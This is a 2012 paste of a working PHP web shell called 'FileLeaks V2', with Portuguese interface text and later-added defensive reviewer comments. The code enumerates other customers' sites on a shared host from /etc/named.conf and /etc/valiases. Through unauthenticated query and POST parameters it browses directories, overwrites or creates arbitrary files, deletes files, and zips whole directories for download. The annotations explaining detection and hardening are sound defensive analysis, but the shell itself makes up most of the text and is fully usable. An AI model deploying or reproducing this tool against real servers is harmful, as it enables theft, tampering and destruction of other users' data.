rhiby

script jumping

Feb 12th, 2012
  1. <html>
  2. <head>
  3. <title>FileLeaks V2</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. </head>
  6. <body style="background: black; padding-top: -10px;">
  7. <div class='header' style='color: white ; font-family: sans; height: 90px; width: 98%; background: url("http://hamboldt.com.br/head_bg.png"); padding: 10px;'>
  8. <b>FileLeaks V2</b><br/>
  9. <span style="font-size: 12px"> Ferramenta idealizada e produzida por "Lucas Andrade de Araújo" com o ideal de obter acesso a arquivos vulneráveis em massa
  10. em servidores locais com sincronia a banco de dados para arquivamento em massa e com possibilidade de download de todos os arquivos obtidos.
  11. <b>Este é um arquivo privado e não deve ser compartilhado!</b> <br/><br/>
  12.  
  13. <a href="?home" style="text-decoration: none; color: white"> Home </a> | Zip ( <B>Made in Brazil</B> )</span> <span style='padding-left: 91%;'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/br.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/ru.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/in.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/cn.png'> </span>
  14. </div>
  15.  
  16. <div class = "body" style = "height: auto; width: 98%; background: rgb(64,64,64); font-family: sans; color: white; padding: 10px; font-size: 12px">
  17.  
  18. <?php
  19.  
  20. /**
  21. * FileLeaks V2 project
  22. * aiming at better performance when working on
  23. * other server layouts, including Windows
  24. * Project started on:
  25. * Monday, 18 July 2011 - 21:11
  26. */
  27.  
  // Reviewer note (defensive): the two calls below try to silence PHP error
  // reporting at runtime, so failed file operations later in the script produce
  // no visible output. 'error_logs' does not appear to be a standard PHP ini
  // directive name, so the first call likely changes nothing -- TODO confirm
  // against the target PHP version. A script under a web root that switches
  // 'display_errors' off and then acts on paths from $_GET is worth flagging in
  // static scans of hosted content.
  28. ini_set ('error_logs', false);
  29. ini_set ('display_errors', false);
  30.  
  31.  
  /**
   * Prints one HTML row per hosted site found on the local server.
   *
   * Reads /etc/named.conf, pulls every `zone "<name>" {` name out with a regex,
   * and walks the first half of the matches (count/2; presumably each zone is
   * listed twice in that config -- unverified). For each name it resolves the
   * owner of /etc/valiases/<name> to a passwd entry and, if
   * <home>/public_html can be opened, prints a link to the site plus a
   * `?path=` link into that directory. Takes no arguments and returns nothing;
   * all output goes to the page.
   *
   * Reviewer note (defensive): this is cross-account enumeration on a shared
   * host. It only works when the web-server/PHP user can read
   * /etc/named.conf and /etc/valiases and can traverse other accounts' home
   * directories. Restricting those reads, enforcing open_basedir, and running
   * PHP per account with non-world-traversable home directories remove the
   * precondition. A PHP process reading /etc/named.conf is a useful host-level
   * detection signal. Zone names and home paths are written into the HTML
   * unescaped.
   */
  32. function _opensites() {
  33.  
  34. preg_match_all('/.*?zone "(.*?)" {/', file_get_contents("/etc/named.conf"), $Matches);
  35.  
  36. for($i = 0; $i < count($Matches[1])/2; $i++) {
  37.  
  38. $user = posix_getpwuid(fileowner("/etc/valiases/".$Matches[1][$i]));
  39.  
  40. if(opendir($user["dir"]."/public_html")) {
  41.  
  42. print("<a href='http://www.{$Matches[1][$i]}'><img src='http://cdn1.iconfinder.com/data/icons/socialmediaicons_v120/16/website.png'></a> <a href=?path=".$user['dir']."/public_html> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'></a> {$Matches[1][$i]} <br/>");
  43. }
  44. }
  45.  
  46.  
  47. }
  48.  
  // Directory browser. `path` comes straight from the query string and is
  // handed to is_dir()/opendir() with no authentication, allow-list or
  // base-directory restriction in the visible code, so any directory the PHP
  // process can read is listed.
  // Each entry is tested with is_writable(): writable entries are tagged "RW",
  // and writable files also get a "Remove" link that targets the ?unlink=
  // handler further down.
  // The requested path and the entry names are interpolated into the HTML
  // unescaped; the "Download" link and the writable-directory links are built
  // without urlencode(), unlike the other links in this block.
  // Reviewer note (defensive): requests to a single script carrying absolute
  // filesystem paths in `path`, `unlink` or `zip_path` query parameters are a
  // usable access-log signature for this tool. open_basedir and per-account
  // PHP isolation bound what such a request can reach.
  49. if($_GET['path'] != null) {
  50.  
  51. if(is_dir($_GET['path'])) {
  52.  
  53. print("<img src='http://cdn1.iconfinder.com/data/icons/Basic_set2_Png/16/arrow_down.png'> <a style='text-decoration:none; color: white' href='?zip_path={$_GET['path']}'> Download <b>{$_GET['path']}</b>.</a><br/><br/>");
  54.  
  55. $dir = opendir($_GET['path']);
  56.  
  57. while (false !== $readdir = readdir($dir)) {
  58.  
  59.  
  60. if(is_dir($_GET['path'].'/'.$readdir)) {
  61.  
  62.  
  63. if(is_writable($_GET['path'].'/'.$readdir)) {
  64.  
  65. print("<a style='text-decoration:none; color: white' href=?path=".$_GET['path'].'/'.$readdir."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'> $readdir</a> (<a style='text-decoration:none; color: white' href=?path=".$_GET['path'].'/'.$readdir."><b>RW</b></a>)<br>");
  66.  
  67. }
  68.  
  69. else {
  70.  
  71. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'> $readdir</a> <br>");
  72. }
  73. }
  74.  
  75. if(is_file($_GET['path'].'/'.$readdir)) {
  76.  
  77. if(is_writable($_GET['path'].'/'.$readdir)) {
  78.  
  79. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/New.png'> $readdir</a> <span style='padding-left: 2%'> [<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."><b>RW</b></a>] [<a style='text-decoration:none; color: white' href=?unlink=".urlencode($_GET['path'].'/'.$readdir)."><b>Remove</b></a>]</span><br>");
  80.  
  81. }
  82.  
  83. else {
  84.  
  85. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/New.png'> $readdir</a> <br>");
  86. }
  87.  
  88. }
  89. }
  90. }
  91.  
  92. }
  93.  
  // File viewer/editor for an existing file named by `path`.
  //  - With a non-empty POST `content`, the file is opened in 'w+' mode (which
  //    truncates it) and the posted bytes are written in its place; a
  //    "Salvo!" (saved) or "Erro!" (error) line is printed from fwrite()'s result.
  //  - Otherwise the current contents are shown, htmlentities()-escaped, in a
  //    textarea whose form posts back to the same URL.
  // The path itself is echoed into the page unescaped in the "Arquivo:" line.
  // Reviewer note (defensive): any file writable by the web-server account can
  // be replaced by one unauthenticated POST. Deploying application code
  // read-only for the PHP user and running file-integrity monitoring on web
  // roots are the controls that catch or prevent this; a POST with a `content`
  // field to a URL that also carries `?path=` is the matching log pattern.
  94. if(is_file($_GET['path'])) {
  95.  
  96. if($_POST['content'] != null) {
  97.  
  98. $file = fopen($_GET['path'], 'w+');
  99.  
  100. if(fwrite($file, $_POST['content'])) {
  101. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Salvo! (<a style='color: white; text-decoration: none' href='?path=".urlencode($_GET['path'])."'><b>Continuar editando</b></a>)");
  102. }
  103. else {
  104. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro! (<a style='color: white; text-decoration: none' href='?path=".urlencode($_GET['path'])."><b>Voltar</b></a>)");
  105. }
  106. }
  107.  
  108. else {
  109.  
  110. print("<b>Arquivo:</b> {$_GET['path']}<br/><br/> <form action='' method='post'>
  111. <textarea name='content' style='background: rgb(16,16,16); color: #009933; border: 3px solid #000; width: 100%; height: 70%'>".htmlentities(file_get_contents($_GET['path']))."</textarea> <br/><br/>
  112. <input type='submit' value='salvar'></form>");
  113. }
  114.  
  115. }
  116.  
  // New-file branch: runs when `path` is set but nothing exists at that
  // location. A non-empty POST `content` is written to the path via
  // fopen(..., 'w+'), which creates the file. Without POST data a
  // "Novo Arquivo" (new file) form is shown; file_get_contents() is called on
  // the path the enclosing condition just found missing, so the textarea is
  // presumably rendered empty.
  // `path` is interpolated into the links and heading unescaped.
  // Reviewer note (defensive): this is arbitrary file creation as the
  // web-server user, which on a PHP host means new executable scripts can be
  // placed in any writable, web-served directory. Keeping web roots
  // non-writable for the PHP user, disabling script execution in directories
  // that must stay writable, and alerting on newly created .php files address
  // this.
  117. if($_GET['path'] != null && file_exists($_GET['path']) == false) {
  118.  
  119. if($_POST['content'] != null) {
  120.  
  121. $file = fopen($_GET['path'], 'w+');
  122.  
  123. if(fwrite($file, $_POST['content'])) {
  124. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Salvo! (<a style='color: white; text-decoration: none' href='?path={$_GET['path']}'><b>Continuar editando</b></a>)");
  125. }
  126. else {
  127. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro! (<a style='color: white; text-decoration: none' href='?path={$_GET['path']}'><b>Voltar</b></a>)");
  128. }
  129. }
  130.  
  131. else {
  132.  
  133. print("<b>Novo Arquivo:</b> {$_GET['path']}<br/><br/> <form action='' method='post'>
  134. <textarea name='content' style='background: rgb(16,16,16); color: #009933; border: 3px solid #000; width: 100%; height: 70%'>".htmlentities(file_get_contents($_GET['path']))."</textarea> <br/><br/>
  135. <input type='submit' value='salvar'></form>");
  136. }
  137.  
  138. }
  139.  
  // Delete handler. The `unlink` query parameter is passed unchanged to
  // file_exists() and unlink(); the three outcomes print "Excluido" (deleted),
  // a permissions error, or a "does not exist" message. Only the last message
  // escapes the parameter with htmlentities().
  // Reviewer note (defensive): deletion is triggered by a plain GET with no
  // authentication or confirmation in the visible code, so any file removable
  // by the web-server account is exposed. Unexpected disappearance of files
  // under a web root, paired with `?unlink=` entries in the access log,
  // indicates this handler was used.
  140. if($_GET['unlink'] != null) {
  141.  
  142. if(file_exists($_GET['unlink'])) {
  143.  
  144. if(unlink($_GET['unlink'])) {
  145.  
  146. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Excluido (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  147. }
  148.  
  149. else {
  150.  
  151. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro ao remover, cheque suas permissões. (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  152.  
  153. }
  154.  
  155. } else {
  156.  
  157. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> o arquivo <b>". htmlentities($_GET['unlink'])."</b> não existe! (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  158. }
  159. }
  160.  
  // Bulk-download handler. Opens the directory named by `zip_path`, removes any
  // existing ./fileleaks.zip, then creates a ZipArchive of that name and adds
  // every entry that is a readable regular file directly inside the directory
  // (subdirectories are not descended into). Each added file and the finished
  // archive are reported with their size, and a link to `fileleaks.zip`
  // relative to the script is printed.
  // $path is reused: it first holds the requested string, then the directory
  // handle returned by opendir().
  // Nothing in the visible code deletes the archive after it is built; it is
  // only removed at the start of the next run of this handler.
  // Reviewer note (defensive): a file named fileleaks.zip appearing beside a
  // PHP script in a web-served directory, followed by a GET for it, is a
  // concrete indicator that content was staged for exfiltration. The archive
  // stays downloadable by anyone who knows the URL until it is removed.
  161. if($_GET['zip_path'] != null) {
  162.  
  163. $path = $_GET['zip_path'];
  164.  
  165. if($path = opendir($path)) {
  166.  
  167. unlink("./fileleaks.zip");
  168.  
  169.  
  170. $zip = new ZipArchive();
  171.  
  172. if($zip->open("fileleaks.zip", ZIPARCHIVE::OVERWRITE) == TRUE ) {
  173.  
  174. print("<img src='http://cdn4.iconfinder.com/data/icons/spirit20/file-zip.png'> Arquivos adicionados em fileleaks.zip: <br>");
  175.  
  176. while (false !== ($file = readdir($path))) {
  177.  
  178. if(is_file($_GET['zip_path'].'/'.$file) && is_readable($_GET['zip_path'].'/'.$file)) {
  179.  
  180. if($zip->addFile($_GET['zip_path'].'/'.$file, $file)) {
  181. print("<span style='padding-left: 20px'> <img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> arquivo <b>$file</b> salvo com sucesso! [".filesize($_GET['zip_path'].'/'.$file)/(1000000)." MB]</span> <br>");
  182. }
  183. }
  184.  
  185. }
  186.  
  187. $zip->close();
  188. print("<br> <a style='text-decoration: none; color: white' href='fileleaks.zip'><b>Baixar</b></a> [ fileleaks.zip ".filesize("fileleaks.zip")/(1000000)." MB ]");
  189.  
  190. }
  191.  
  192.  
  193. }
  194.  
  195. }
  196.  
  // Default view: when none of `path`, `unlink` or `zip_path` is supplied, the
  // page calls _opensites(). A bare request to the script therefore reaches
  // that function with no login step in the visible code.
  197. if($_GET['path'] == null && $_GET['unlink'] == null && $_GET['zip_path'] == null) {
  198.  
  199. _opensites();
  200.  
  201. }
  202.  
  203. ?>